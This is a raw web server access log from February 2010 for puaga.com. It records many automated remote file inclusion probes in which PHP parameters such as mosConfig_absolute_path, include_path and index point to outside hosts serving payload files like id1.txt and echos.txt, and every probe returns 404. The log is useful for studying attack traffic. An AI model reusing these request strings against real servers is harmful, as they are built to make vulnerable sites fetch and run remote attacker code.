218.38.136.125 - - [07/Feb/2010:08:59:59 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:02 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:31 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:31 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:00:38 -0800] "GET /home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:00:38 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:00:38 -0800] "GET /logs/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:41 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:09:00:44 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:09:00:44 -0800] "GET /include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:00:46 -0800] "GET /logs/access_100106.log//guestbook1//admin.php?include_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
220.181.94.213 - - [07/Feb/2010:09:00:49 -0800] "GET /orange_g/forum/viewtopic.php?p=28109 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "puaga.com"
216.119.103.12 - - [07/Feb/2010:09:00:52 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:57 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:57 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:00:58 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:01:00 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:09:01:02 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:09:01:02 -0800] "GET /logs/access_100115.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:01:21 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:01:34 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:01:34 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:01:34 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:14 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:24 -0800] "GET /home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:24 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:24 -0800] "GET /logs/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:27 -0800] "GET /home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:27 -0800] "GET /logs/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:02:27 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:02:28 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:02:37 -0800] "GET /galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:02:45 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:02:47 -0800] "GET /logs//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:02:47 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:03:56 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:03:57 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:04:03 -0800] "GET /logs/access_100106.log%20//guestbook1//admin.php?include_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:04:11 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:04:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:04:18 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:04:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:04:32 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:04:56 -0800] "GET /atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:04:56 -0800] "GET /logs//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:04:56 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:05:01 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:05:02 -0800] "GET /atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:05:02 -0800] "GET /logs//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:05:02 -0800] "GET /logs/access_100105.log//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:05:02 -0800] "GET /logs/access_100117.log//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:06:03 -0800] "GET /logs//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:06:03 -0800] "GET /logs/access_100105.log//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:06:03 -0800] "GET /atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:06:03 -0800] "GET /logs/access_100117.log//atom.php5?page=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:06:26 -0800] "GET /logs/access_100115.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:06:26 -0800] "GET /logs/access_100108.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:09:06:40 -0800] "GET /logs/access_100123.log//include/lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:07:07 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:07:08 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:07:13 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:07:33 -0800] "GET /galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:07:33 -0800] "GET /logs//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:07:43 -0800] "GET /logs/access_100115.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:04 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:04 -0800] "GET /logs///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:04 -0800] "GET /logs/access_100113.log%20%20///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:07 -0800] "GET /logs///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:07 -0800] "GET /logs/access_100113.log%20%20///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:07 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:09 -0800] "GET /logs/access_091231.log%20%20///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:10:11 -0800] "GET /logs/access_091231.log%20%20///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:09:10:26 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:09:10:42 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:11:24 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [07/Feb/2010:09:11:26 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.carex.co.kr/bnp/data/log/.rr1??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:12:08 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:12:08 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:12:08 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:12:08 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:12:08 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:09:12:22 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:09:13:26 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/sirini_ezset_fullpack/view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:13:51 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:14:13 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:14:13 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:14:18 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:14:54 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:14:54 -0800] "GET /logs/access_100202.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:14:54 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:13 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:14 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:14 -0800] "GET /logs/access_100202.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:15:15 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:15:19 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:15:24 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:45 -0800] "GET /logs/access_100202.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:45 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:45 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:15:56 -0800] "GET /logs/access_100105.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:58 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:59 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:15:59 -0800] "GET /logs/access_100202.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:16:27 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:16:27 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:16:27 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:16:41 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:16:59 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:16:59 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:17:02 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:17:02 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.68.4.44 - - [07/Feb/2010:09:17:02 -0800] "GET /logs/access_100202.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:03 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:46 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:46 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:47 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:47 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:54 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:17:57 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:18:10 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:18:14 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:18:14 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
